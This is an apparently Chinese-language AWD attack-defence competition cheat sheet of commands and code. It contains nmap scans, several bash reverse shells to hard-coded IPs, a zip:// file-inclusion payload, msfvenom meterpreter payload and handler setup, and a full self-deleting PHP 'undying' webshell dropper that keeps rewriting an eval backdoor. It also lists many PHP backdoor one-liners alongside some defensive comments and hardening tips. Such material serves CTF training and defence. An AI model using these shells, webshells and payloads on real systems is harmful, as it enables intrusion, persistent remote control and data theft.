
AWD整理

AWD整理

nmap -nv ip n不要域名解析
nmap -sS ip SYN
nmap -T4 -A 高強度

python -c 'import pty;pty.spawn("/bin/bash")'

tar -zcf /tmp/xxx.tar.gz html
tar -xzvf /tmp/xxx.tar.gz

mysqldump -uxxx -pxxx dbname > xxx.sql

passwd
修改網站管理者密碼（注意：下面的語句沒有 WHERE 條件，會把 users 表中所有帳號的密碼一起改掉）
update users set password=md5("xxxxxx");
修改資料庫密碼
set password for 使用者名@localhost = password('新密碼');
（MySQL 8.0 已移除 password() 函式，改用 alter user 使用者名@localhost identified by '新密碼';）


bash -i >& /dev/tcp/10.51.4.222/8384 0>&1
bash -i >& /dev/tcp/10.11.23.226/5555 0>&1
/bin/bash -i &> /dev/tcp/10.51.4.222/8384 0>&1
echo "/bin/bash -i &> /dev/tcp/10.11.20.71/5555 0>&1" | /bin/bash

rm -rf /var/www/html/upload_lab/upload/*

zip:///var/www/html/upload/test.zip#test.php
http://123.206.174.251/include/2/?

op=zip://uploads/ea064516fe1e37af816bb52faa08eeb8589af4c0.png%23p

利用msf
msfvenom -p php/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=5555-f raw > 77778888.php
msfconsole:
use multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 0.0.0.0
set lport 5555
set ExitOnSession false
run -j

php不死馬
caidao

<?php
	// Persistence dropper (the "undying" webshell seen in AWD exercises): after one request
	// it keeps re-creating a backdoor file from a long-running PHP process.
	// Defender summary: deleting the dropped file alone does not help while this process is
	// alive; stop the PHP / web server worker processes first, then delete the file.

	// Keep executing even after the HTTP client that triggered the script disconnects.
	ignore_user_abort(true);
	// Remove the script execution time limit so the loop below is not cut off by it.
	set_time_limit(0);
	// Delete this script's own file from disk, so the original upload will not be found
	// by a file listing; the loop below still runs in the already-started process.
	unlink(__FILE__);
	// Target path of the dropped file. The second assignment overwrites the first, so as
	// written only the Windows path is used. The leading dot in the first name makes the
	// file hidden from a plain `ls`; use `ls -a` when checking the web root.
	$file = '/var/www/dvwa/.ski12.php';
    $file = 'D:\\z_myweb\\phpStudy\\DVWA-master\\dvwa\\busi.php';
	// Content written to $file: a PHP page that passes the POST parameter "a" to eval()
	// when the MD5 of the GET parameter "pass" equals the hard-coded hash.
	// Detection: search the web root for eval() on request data and for this hash value.
	$code = '<?php if(md5($_GET["pass"])=="cdd7b7420654eb16c1e1b748d5b7c5b8"){@eval($_POST['a']);}?>';
	// Endless loop: rewrite the file, then sleep 5000 microseconds (5 ms), so a manually
	// deleted or edited copy is restored almost immediately.
	while (1) {
		file_put_contents($file, $code);
		// Disabled line below: would set the dropped file's modification time to a fixed
		// past date, so do not rely on mtime alone when hunting for recently changed files.
		//system('touch -m -d "2018-12-01 09:10:12" .ski12.php');
		usleep(5000);
}



後門（常見寫法；防守時可在網站目錄中用 grep 搜尋這些函式名稱來排查）
eval($_POST[“a”]);
assert($_POST[“a”]);     可以寫成$a=“assert”;$a($_POST[a]);
array_filter(array($_POST[“a”]),”assert”);
preg_replace("/test/e",$_POST[“a"],"jutst test");
$func =create_function('',$_POST[‘a’]);$func();
echo array_map(“assert”, array($_POST[“a”]));
call_user_func("assert",$_POST['cmd’]);
call_user_func_array("assert", array($_POST[“a”]));
等等

删除不死馬
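kill -9 -1
kill -9 -1
（-1 代表目前使用者能發訊號的所有行程，請以網站服務使用者（如 www-data）身分執行；以 root 執行會殺掉系統上幾乎所有行程。行程結束後再刪除被反覆寫入的檔案，否則檔案會馬上被重新生成。）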


linux建立使用者

useradd -m username1
passwd username1
usermod -a -G sudo username1

防注入
addslashes（只是跳脫引號，不能完全防止 SQL 注入；能改程式碼時優先用 PDO / mysqli 的預處理語句）
htmlspecialchars（用於輸出到 HTML 時防 XSS，對 SQL 注入無效）



           
